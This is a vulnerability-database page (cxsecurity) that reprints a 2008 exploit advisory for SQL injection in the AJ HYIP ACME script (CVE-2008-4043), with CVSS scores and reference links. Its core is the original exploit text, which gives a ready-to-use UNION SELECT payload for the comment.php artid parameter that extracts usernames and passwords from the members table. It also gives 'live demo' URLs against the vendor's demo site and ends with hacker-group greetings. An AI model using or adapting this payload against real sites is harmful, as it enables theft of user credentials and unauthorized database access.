Bug: AJ HYIP ACME (comment.php artid) SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

AJ HYIP ACME (comment.php artid) SQL Injection Vulnerability

Published
Credit
Risk
2008.09.14
security fears team
High
CWE
CVE
Local
Remote
CWE-89
CVE-2008-4043
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

### proud to be muslim
### ###
### rEm0te sql injction VulnErability ###
### ###
### (ajhyip manager script) ###
### ###
###
### AuTh0r : security fears team ###
### ###
### Home : WwW.alsonaa.com ###
### ###
### members: HeB4RieH , germaya_x ###
### ###
###
### Script Name : ajhyip ###
### ###
### download : http://www.ajhyip.com/ ###
### ###
### Email : s-fteam@securityfears.cc ###
###
### d0rk :: "use your mind" ###
### (you can log to control panel from http://site.com login.php) ###
### ###
### -(:: sql Code ::)- ###
### comment.php?artid=(sql) ###
###(sql)=5+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9+from+members/* ###
### ###
###
### -(:: l!ve demo ::)- ###
### ###
###http://www.ajhyip.com/demo/prime/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password)
,6,7,8,9+from+members/*
### ###
###http://www.ajhyip.com/demo/acme/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),
6,7,8,9+from+members/*
-(:: !GreTzZ! ::)-
::SnIpEr.KiLLeR::fa6al error::black cheetah::members of alsonaa.com::str0ke::MusliMs HaCkErs::

References:

http://xforce.iss.net/xforce/xfdb/44803
http://www.securityfocus.com/bid/30974
http://www.milw0rm.com/exploits/6350

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version